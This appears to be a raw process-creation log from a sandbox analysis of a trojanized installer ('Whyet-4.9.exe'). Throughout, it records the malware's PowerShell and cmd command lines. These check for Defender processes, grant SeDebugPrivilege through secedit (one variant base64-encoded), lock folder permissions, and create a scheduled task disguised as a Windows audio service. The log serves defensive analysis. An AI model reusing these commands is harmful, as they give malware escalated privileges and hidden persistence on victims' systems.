Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Whyet-4.9.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5655410 "__IRAFN:C:\Users\user\Desktop\Whyet-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=5800').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
